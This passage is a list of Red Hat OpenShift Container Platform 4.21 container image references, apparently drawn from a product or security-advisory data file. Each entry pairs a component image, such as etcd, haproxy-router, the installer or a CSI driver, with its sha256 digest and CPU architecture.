"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:a0e267de6bed29219c427f960712fef9345af738251bcf9d471895d019ec894d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:db5a00fe20fb9b52f0a5e01bd5462d1db5725c4b91354ee38d70fc32f6330191_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:f11375cabff0a8433c9a1af3d097482d48f29a060609a30391fcf1bbd24bf0ce_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:6fa875bee4fc70d30398f87be115e6e3c9574e5cdd469371589d55eff70ab5cf_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:df3604d1255d191a0108b37c87dfb3674e27f1adbc6a1e73df74182b2252f900_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:e1d620dd772b606f22d2d87212bb177c49ff06534e7f6c3c23b63989f7f3d9da_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:f645058a52bda117e49b0dcaddeb6a94d09dc50410cbd1ad976be96d1e1af407_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:153a55ce471731257054208373296f8f46f011cf5919a9619803abcd790c1ade_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:ae8f624c43ae3af3011158c8f646d1055d5042f2b9e0314611c84a6a1eed1bac_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:c250ea4c101b9b0193fcdeffece7e816dd2db1e670af97176e38b2785fa68900_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:dc09c24ed64144c3786b201426b0d796896d5d4ab5c512be8b384863d6f02884_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:595b03c50302148c33de51825571a2b59a1930591d461a717315be05c6efdbb1_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:6dc06ddd4760393cb6737b9c259e41a33065392db9aa772d86da211e17949e16_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:8c949eabc7146e5cf5d7dbe0faa19717bbc6798e8bddc4b387fa8f498697cfa8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:e09166e12e41529af8b4097fd30b3b874d7415e0001f3bad5051a6e2c4962cff_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:60c0c64458e0e76742fc7b6a89a556ae479c0db8696a9ea4e26fcd761c8bcf70_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:6bb20817f634256d50553f735342581d901334968247da8a6a53173d1205f220_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:bbb9cea4afaf999cb15d7c55d31f9825167ba7a9cf7fc9e43e418c7bc5463502_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:c90d130c0e235ccb6395abdf3a0ce0e21fc14de92425b7fd5b517d3d0f9ad1fa_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:7d1370d3d3a2f2f50cffd40783e46a0c830cb7326231de0c620d71c832422fc4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:ad3637958bf538933748f6a7bf3512bf18d01a4082e308dfd7a451639601b320_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:e13bbf95fdfd5a8f1ae64cb7f0c06ea5773d7f133584c4488d4d4b2411b36bbd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:f27fe2d2c41b23c7fc8dc7dd2c442b792583c424c60f72e425dd91a1358c7fd8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:04a546e0d3565c8b6fe8975074b5a4ddf8bb9d2cb76fdc5083d6313e96c4c084_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:1bdf652d7b821aaf84e717f811073cfc347ad45e86b5d6a01f89f68eefe2eb3e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:bfaf7ccaf20cb2c1f4808d0729ee29dd040d1a6affc10c54512637f3f348eff9_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:c6ffe0b9527d2431a8cb3aa16e0f353e5f715278ed48282ac33be339a704bdda_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5199b636240c6bce865db65c585dad4557b45f20dd78c275df7536c17ee5f8c7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:7b8d5213a8ee963f2edde31d4865d0450267d35505467c217a490efc1afe8289_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:e683a2939c279d6b694eca7d8591e66459b880eefe3d5ba3312e2ed90e8337e5_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:ee26deea807e27278f4286dcc3d62a2ac54dcd75e52b20150c943d5556367222_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:4bf941cfba094da6cc387b0b24430b60131c812dfb179e8ca0f57e15b4757434_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:7958abc201949f9faed6fe6cd4f8e2f8dab06dde35f09779cec19e9286f3983d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:b813e2c74a2180534b64eba9e4847ce7799f2c6b36cc91d429d0f3ea7e8d8e6d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:e38a0d0e75270f3acdb47ba5e7f0359ec7de6bfa1cadcc082ab9393cad673990_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:1a4181f0d2ba03e2168f4bf87be3290711b65e96da3998b1315e6d29ed56bb5e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:c17093b12e451052d0b50b93e4f165608cc0f32fa2813c703756c66805e5912b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d618e7ff80f4919d20ed8639c9a61e3db83c500628b22cb92bafc08597c44953_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:f50ed232b96a6a5809867d68ccfd688a03d506c88aab1607bc115553c8ebf3a9_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:4bb9e672922e50ec937868aad492e319d40d7c24a247650f2d39fe2ab5f4c6db_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:605aba5c7d9d19b5505ccef7f194c4842c3fb95de679d1b6644695efff259356_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ec7a31da8937a874a6e5bb866f53f21eae3b174663e2f4e7c6bfceadb6ef9415_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:9f76b703dd3bda6e39fee67990cbf7f18ca3856b51610ecd8e3355e435af9863_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:acd9330cdd75e08c16c5f0e819d4200d353af95fe5943d25b7f4eec4c6f4595f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fde514cea5c59ece8928a6f9248fd58858ee0b3ae6df84281f0a2f00ad2e507f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:062c301cf5f354992055176ee1ba2cfd03748cb1045c1a1819e34ff71c0775b3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:a023bca30051596776daab0263ddb617d2a13dabc46de5c97f123b253fbf3d29_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e940d0365a64e273be01d35537c61be14f5ec1c3e8971ee8a41382861cf35efe_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:0ffaa1a15a78babd7663e94f876629d768f7e7835c3778d96b146b7fb758d0b1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:71be38fcf1f7e316ccc94937d0ebe9799762a8cbc14cadd426342c4cbc47f259_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:82c80097ae5a60ac10a19d486cba96bc72e5b799350e925a459ae0bb37cc22b3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:7fd964ab54bcdea280ba34f98d6d9f7365c4bbda46136e63ee80a19f231e36be_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:854ddefe9f6d6c6a9afa3df8188f96fa05364a28ec6432ad248bcd2e457182a1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:f882bedd7b4e73d9e850a3ffeec653718848cb596ce8bfbbb34a0a7f4a36a680_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:fca3cb9d3e9541e01418795e31ebc918fef89031828d64846c81ab59eb3fb4d2_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:015d764fd216b07543e8c2d0f25aa29f9695e8501c178f0ee3b6759bde5631ce_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:827cfae8caf3dbc109b7a17cad74a55d9a4b2b037be5da6174a4e0fba36de5d0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:afb37a117f3ef2967b8ade392055bd3aadce2a2c19f21eb3b36e39224dc046c7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:e8badf78c7d338c04dc43be33d6de5484c70d2d60388d26b77bbed2ffa2f7071_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:130477ef0652a23921c63297c08c35a8e89a06e02d7be26a6e6cc5e0855a3693_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:18cd11b57cbd5d2a7a277bc8abe8ff6f5f2b663072f9d44994e4093fc986ea39_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b150b48e8f6a937e9d025c72761ac9d2ca82d59d69ce28a36a1108f09250c53b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:c9b03caecf5048cc37952df8194ddb113de62bdb7ebbb8a927a3299e1e3975b6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3990f7f0d2e505ec391fe3056a175d985b5f508642740bcbf8b61fabf6ecda75_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:4cd532032ab58f5d6029ec366d79f46c909db4374fbc26212558e689f7059f07_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:8c9c050549f490f6b96eca68bb61a32f164b2152cae31b4ffb7d7ecc4bd678b1_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:fff15ac26ca10cbbdd23fcf4510a4b2b69c01de3fce1d70ae016933237e8676e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:2625f633345e56a2c008602b6489037488fc9054ff973cae80939ab88cc19d8b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b571a143b03ff7d75ad86bbd890817a644ef5b52de0881e2beb1e8f25c056ecd_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:7cdd19649ef45a859affbcda295276a1c1b356f20be2ba11db57b713ddd432c9_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:eea66c84f7e2f69e9fbefc1b58ec9e544c1b6c3320bb631dbe2240a8737b600d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:d8c47e73a2fd940fc9162adbbd62341086bd61376a830dfa270eeaed7621dc46_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ee3b692430aea38ad28dc9a7cf80a579ca8341d355372852ac7e69b2aaff30e4_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5484533f421052d86a8d6ba388f38f3feb68e7a2e015a7123da87b7b4c7980b6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:7406513da534756c4929f48e1a765a026e129ca0f61d49d415374f8e15c11c5a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:b80d2f4064ca975b20a8111782afce45f005a6ec12a78d8d3f9d544b30bb2a27_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:45eaefe5b35fc9fb7755ea44fca6b12a1ab7e65d933055e98bdf458b6ba5e50d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:c1977cc007191a46853b0a3915c45e9561664d4e06516ef1a04e8562df31420c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:47db252dd861d805da4299bc67982e1472777ae0484edc17c43d6f0bcac74c94_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4ea870b393120ff9a209eb91c1694ab03e340cd92e0bf45574a386bd715ab1af_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:77d16684819289af124e53b26a96c187bc848d23fa00a054fd4253c922e21ac8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:94b8f7046824d7fc258908303d0dd7dea98dffdb71da75473741701d5630fd43_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:a3954de25adc3d89613106ebb867d565ffe356b4febb3b9c1470d46bdd4a8547_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c7fa7dc7e546ef6d5b322e521bdbf86e7be13859167e071839d6164a128b5954_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:303710848cd4644e4235da51f011840fae00d5b30df2f55cad1fe3bb91c0ce41_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:7faae8cecca99097bc78c149ff89aaf22ab736bd159983233c569fb79f59f315_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:df2d51c852854930ef5a93f74c83c11df4e7042bee92bb7c33366f648dbe3b41_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:e176cc10b2b9b4b8659796de90b1680c040f79c0f0403f0ef534652144128f7a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:023d697b90f072bb4c7caab8ff197eaaa38a6c2c77b1c9ce05e569061fb87ce7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:257e4cd3d8aca92de36e31ffefb6e9b286c602a32ae1c3f63e4fc59cbd1e4291_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:d25b4e91c945b9beda5248f7ff1b108d3f334748fb2dfcb9d46be984925f194d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:e979034a8badf7cc5b0091f97e3e8d2e7b4db1e14aa71256974e7ad58324bfc3_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:b973fa55da388a8ed7dc04cb6f84da7e5f2ae1e015300130c44a3ccf7502939d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:c8c48ba4ef25cf37ddfc8608146b64c4d7d881b15bbe42a1d3390bfc9bec1709_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:98c91c5062e8d7e164e71ba67cf154a2e7ebd7de83a65f622c3cefcff573e9e4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e07d700e6f778cf8569cc916351b1eb79ef7abbfb34e556503d276f72a21b0fe_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:82c763564d85a635ca0815947d90786d847855f6759d091818d35cb260b807d3_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:8a558ee0c2898ad2d4af602a4cf7e13d5f4bac6fafc958088ce0af1ad6b23abf_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:128f1ceb7f59758ea0001dbc24659a199a519f077c89c686574d577f9082598b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:ddb73dd86afdfb11fd4d2f2ca9323a72e9ab3030026f3bc48238513a3fab8c75_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:1df147ec39f8163f0d3071c46e0cc2b6bf2e0ca3a72d98cb01337e1e15d3df0b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:43f06bfcf33a143963b6f2f459e2348977d20639165881d3c94fc50504ff589d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:be44136cdbbda20d1628aefa40838aceeb7d0a6009e4e182ea886ae561e5df68_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:cc22af0f83fccd128938409d0d7adc4584b9232d73e9be2f4f57d6189d3a70f8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:27255764d47f35147d02850500d774d54c4216c802d2cfb01c0ab555540a85f3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:40b00fab8ba7620d9ad8884b9609046aa8e08647f4832d60a0b5168adf3cfffa_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:49129f16b6f9dee24e02c0972ebaa059b4a86976d4dc612f129a7f576a8bb01a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:9a37dc47bb380727304270fb8e508f4e2f638ae70a5c90c055d212bf72368488_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:0b449cd4c58e81397bc99ba2d0970585d2a3cc1472a8134b46cf20e8c488b8c5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:18ac01a31557a6a6b97d34d8cae22ffbd27e3f9ec3d5f63e45c78cbf07020044_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:a37e5b31b6b72957a891fc6a9186b33a810109ccbd55e30cfbb4c4eaadb70be4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:ff584bede1ee71be248b0f2070dee6ea3b78050e88b88682c28fc797ac660623_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:145ba54fe931a01cab8cef5d1d1535a1f3b719403b000e2b34256d7ede7ec6f8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:922f2719d99173cc43cc0c575706dfdf0b18d04fbbebfa361f3b8da58c00a5ec_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:92a8781fdc3b5f1db9a5c578b6685dc56093a1d5c273ee3abc6270ee9400387e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:fd42f2dec072128bf5f2838c94a1d7c806c76a040e71150671f97c1d82a0276d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:3d02603962035bdee1a13b1b0d17740cc9c5bcdc89f2372652e5a7dd907ca313_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:7cd0ca58e7ebd7d6f24025a8d3fb64c4026e54490d353af970d0fc0ff51c47a4_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:a5c0bd42f2ffe7c2d87f8c5ecb5910a64bb63bdceac83669cb38b5180907e052_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b98ba3b15b09a6308b2683aa2740c02ca6c552a866845887e2ca6f5aad6c133a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:06a7767e01204923e118d012ee39152119980e1d59db0810aac1ddf27af2abdf_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:0b83daa834cf9df259d8fd475c2678d92c6dd44ed697a96c24ac8921a972b58f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:1379cb01ad37cd0e9485c04dbe8ed2fa8eef5eac26a5c9b12277bda753d80305_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:68934420721c5ebe998524dbacea9d8242080a7e7949efc753236c4c28c57edf_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:036574a35e17a571639d3f885f5699462f7ad81e5b2ddc445259eea543f54daa_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:1a8d2b216d3d35f3d94b8ce9796e3df908550d7e323e2d034dd5ef38a2f4990b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:52131756a73a6e25eadcf416566a3e46e2fa2319e3e5ec9cf68b707045e1c6b0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:5d3761ab41937e14fd4b1bd4d93e01d3fc234552c14dd4a36026afe2a656229c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:795541dbfc7bb3bda387c4f1647233c0f1ace2abcf3e74d99c4ce6f48abc7edc_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:ac5b7d8a01e37587166f1526c80776770c07821056b23f10b9d1d0801a09503f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:2e237915caa1fc0afa9af6fecd82ba8820da8a624e1408f7a4cf4eca9e0143b9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:6decd3b60d897571e96a3b6f468e1dbcec4ca95b871088916d2b03241c25a033_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:8fbf341238b95948d702ad7a7909113c4eb5d670f06d4d3be3cb6a6f6594c05e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:ab0b0d0164deea8407004db4c43be6d6626fcb35dee99f9a75e2fd5bfca244b9_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:b41028530a79f61694e118c620aab19a115088725164e8c722de2671c7eb75a5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:1e7f9f39328a9e5c080ba7e18a7a1c17a179c36816d4394d8f1aa8e38cd0d889_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:2427ae0356c24a0f1f1b48a5fa27ec0a853b27ac613b3dcdf446b262fa05283c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:38bddd418fcb1a18484126c2095e6ae2c1bdee8e9667c8b34d7c423851105410_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eb3b40f400c13c67de4aa77a3dcde6fa23a03b6ef172c6a3ac8762cee620608b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:73e70d522fb58b91a88bf3b47211295ee9f800394c5367772dec9a3bbdc0c513_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a44c7d7358f6e6323c1898ea14923840a93d99447233c7f10fa1d3975b096bbd_amd64",
